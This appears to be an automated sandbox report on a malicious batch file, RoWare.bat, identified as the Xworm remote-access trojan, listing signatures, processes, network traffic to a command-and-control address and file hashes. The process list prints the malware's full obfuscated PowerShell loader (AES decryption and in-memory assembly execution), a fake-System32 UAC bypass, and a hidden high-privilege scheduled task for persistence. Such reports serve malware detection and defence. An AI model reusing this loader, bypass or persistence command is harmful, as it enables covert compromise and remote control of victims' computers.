Analysis Overview
SHA256
5baff04fad6153b7debb8003997edf677cd677263af4ab9e95510e225401ccde
Threat Level: Known bad
The file RoWare.bat was found to be: Known bad.
Malicious Activity Summary
Detect Xworm Payload
Xworm
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Executes dropped EXE
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Delays execution with timeout.exe
Modifies data under HKEY_USERS
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-06-09 23:13
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-09 23:13
Reported
2024-06-09 23:17
Platform
win10-20240404-en
Max time kernel
80s
Max time network
135s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Xworm
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows \System32\ComputerDefaults.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections | C:\Windows\system32\svchost.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k rpcss
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s LSM
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Schedule
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s EventSystem
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Themes
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s nsi
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s UserManager
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s SENS
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s NlaSvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s Dnscache
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s netprofm
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s StateRepository
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s CryptSvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s WpnService
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Browser
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s CDPSvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s TokenBroker
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\RoWare.bat"
C:\Windows\system32\cmd.exe
cmd /c "set __=^&rem"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jiNE3E2FLDv+NKiKFH8uo69QT6nLdIqdGCpMMEmvmwY='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2SAi3wOvnkUFLRYxrM1Aug=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $bjuhq=New-Object System.IO.MemoryStream(,$param_var); $lHqpc=New-Object System.IO.MemoryStream; $ZhWoP=New-Object System.IO.Compression.GZipStream($bjuhq, [IO.Compression.CompressionMode]::Decompress); $ZhWoP.CopyTo($lHqpc); $ZhWoP.Dispose(); $bjuhq.Dispose(); $lHqpc.Dispose(); $lHqpc.ToArray();}function execute_function($param_var,$param2_var){ $DjkcC=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $tpQof=$DjkcC.EntryPoint; $tpQof.Invoke($null, $param2_var);}$adpqO = 'C:\Users\Admin\AppData\Local\Temp\RoWare.bat';$host.UI.RawUI.WindowTitle = $adpqO;$cSfZG=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($adpqO).Split([Environment]::NewLine);foreach ($zHjor in $cSfZG) { if ($zHjor.StartsWith('dxmcSvpkIMoaFKFAdSEr')) { $kULPw=$zHjor.Substring(20); break; }}$payloads_var=[string[]]$kULPw.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c "C:\Windows \System32\ComputerDefaults.exe"
C:\Windows \System32\ComputerDefaults.exe
"C:\Windows \System32\ComputerDefaults.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c rmdir "c:\Windows \"/s /q
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\RoWare')
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote startup_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-SCV.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpB0D8.tmp.bat""
C:\Windows\system32\timeout.exe
timeout 3
Network
| Country | Destination | Domain | Proto |
| NL | 91.92.250.4:2709 | tcp | |
| US | 8.8.8.8:53 | 4.250.92.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa | udp |
| NL | 91.92.250.4:2709 | tcp | |
| US | 8.8.8.8:53 | 89.16.208.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
Files
memory/4568-5-0x0000028A3F370000-0x0000028A3F392000-memory.dmp
memory/4568-4-0x00007FFA77893000-0x00007FFA77894000-memory.dmp
memory/4568-35-0x0000028A3F530000-0x0000028A3F56C000-memory.dmp
memory/4568-47-0x0000028A3FBE0000-0x0000028A3FC56000-memory.dmp
memory/4568-46-0x00007FFA77890000-0x00007FFA7827C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ul3ybabr.j1q.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4568-12-0x00007FFA77890000-0x00007FFA7827C000-memory.dmp
memory/4568-56-0x00007FFA77890000-0x00007FFA7827C000-memory.dmp
memory/4568-57-0x0000028A3F3D0000-0x0000028A3F3E0000-memory.dmp
memory/4568-59-0x00007FFA93EE0000-0x00007FFA93F8E000-memory.dmp
C:\Windows \System32\ComputerDefaults.exe
| MD5 | 56d03e4218082266a9cdd8600537d891 |
| SHA1 | c153719f971dcee8f6985d7c79f64fc88dd8663c |
| SHA256 | 210d5714497505022aa068167f7ed5bb826abcf53cfe741c9860a2c8dce3f54a |
| SHA512 | f2c64a4dbab789635bf97b3d615fcc96dfe8c4094b67a464eb34bc84501eb7648e7fa692971e917c1ebfac0548187721ecc552aaad35767f8a40846d922613d3 |
memory/4568-74-0x00007FFA77890000-0x00007FFA7827C000-memory.dmp
memory/4568-67-0x00007FFA77890000-0x00007FFA7827C000-memory.dmp
memory/4568-60-0x0000028A3FE40000-0x0000028A3FE8C000-memory.dmp
memory/4568-58-0x00007FFA94510000-0x00007FFA946EB000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | ad5cd538ca58cb28ede39c108acb5785 |
| SHA1 | 1ae910026f3dbe90ed025e9e96ead2b5399be877 |
| SHA256 | c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033 |
| SHA512 | c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 90721248abf6fb303c58a4f6b894e5a8 |
| SHA1 | e6b54550c25ac1a98fdb6216b1995dbffd0cb13e |
| SHA256 | 229e10e8ea4a8d547221c7fbb2f95b427473b931ba9a50d57102c1384cb08a1f |
| SHA512 | b8fbfba910f0483410f69f206af3b9ad239e97421833e706178a04c63fe5c32b81d4b9662d1f22cde9d6566aa22aaa876374f7a8b3f6726f08937e79407c7980 |
memory/3884-162-0x0000000000CD0000-0x0000000000CFA000-memory.dmp
memory/4568-172-0x0000028A3FFA0000-0x0000028A3FFB4000-memory.dmp
memory/3884-176-0x00007FFA545A0000-0x00007FFA545B0000-memory.dmp
memory/1564-179-0x00007FFA545A0000-0x00007FFA545B0000-memory.dmp
memory/2160-181-0x00007FFA545A0000-0x00007FFA545B0000-memory.dmp
memory/1172-184-0x00007FFA545A0000-0x00007FFA545B0000-memory.dmp
memory/2144-199-0x00007FFA545A0000-0x00007FFA545B0000-memory.dmp
memory/1132-202-0x00007FFA545A0000-0x00007FFA545B0000-memory.dmp
memory/1524-204-0x00007FFA545A0000-0x00007FFA545B0000-memory.dmp
memory/2472-211-0x00007FFA545A0000-0x00007FFA545B0000-memory.dmp
memory/1264-215-0x00007FFA545A0000-0x00007FFA545B0000-memory.dmp
memory/68-216-0x00007FFA545A0000-0x00007FFA545B0000-memory.dmp
memory/900-212-0x00007FFA545A0000-0x00007FFA545B0000-memory.dmp
memory/2292-210-0x00007FFA545A0000-0x00007FFA545B0000-memory.dmp
memory/1668-209-0x00007FFA545A0000-0x00007FFA545B0000-memory.dmp
memory/3480-208-0x00007FFA545A0000-0x00007FFA545B0000-memory.dmp
memory/2496-207-0x00007FFA545A0000-0x00007FFA545B0000-memory.dmp
memory/1852-206-0x00007FFA545A0000-0x00007FFA545B0000-memory.dmp
memory/3840-205-0x00007FFA545A0000-0x00007FFA545B0000-memory.dmp
memory/1516-203-0x00007FFA545A0000-0x00007FFA545B0000-memory.dmp
memory/348-201-0x00007FFA545A0000-0x00007FFA545B0000-memory.dmp
memory/744-200-0x00007FFA545A0000-0x00007FFA545B0000-memory.dmp
memory/2520-183-0x00007FFA545A0000-0x00007FFA545B0000-memory.dmp
memory/1768-182-0x00007FFA545A0000-0x00007FFA545B0000-memory.dmp
memory/1180-180-0x00007FFA545A0000-0x00007FFA545B0000-memory.dmp
memory/392-178-0x00007FFA545A0000-0x00007FFA545B0000-memory.dmp
memory/1152-177-0x00007FFA545A0000-0x00007FFA545B0000-memory.dmp
memory/4568-254-0x00007FFA77890000-0x00007FFA7827C000-memory.dmp
memory/4568-253-0x00007FFA77893000-0x00007FFA77894000-memory.dmp
memory/4568-258-0x00007FFA77890000-0x00007FFA7827C000-memory.dmp
memory/4568-259-0x00007FFA77890000-0x00007FFA7827C000-memory.dmp
memory/4568-260-0x0000028A40350000-0x0000028A4035C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tmpB0D8.tmp.bat
| MD5 | 316bdc980c78c4fbf5e6852ebab08d5b |
| SHA1 | e4c486ab6a9748cb7130bf46cee4359b838dcfd8 |
| SHA256 | a12b64ab319db0958ec22d881d859fe7432d8b28e887a355f3c71b805dbafb0a |
| SHA512 | bcb772a9e8fa2def85ee6655fff62e22a403371bb09906a5931fd25ef00cdd941cca007273189bc6f4bb835d5641102e4f80af6bd0994a6829157c79f18dcb70 |
memory/4568-266-0x00007FFA77890000-0x00007FFA7827C000-memory.dmp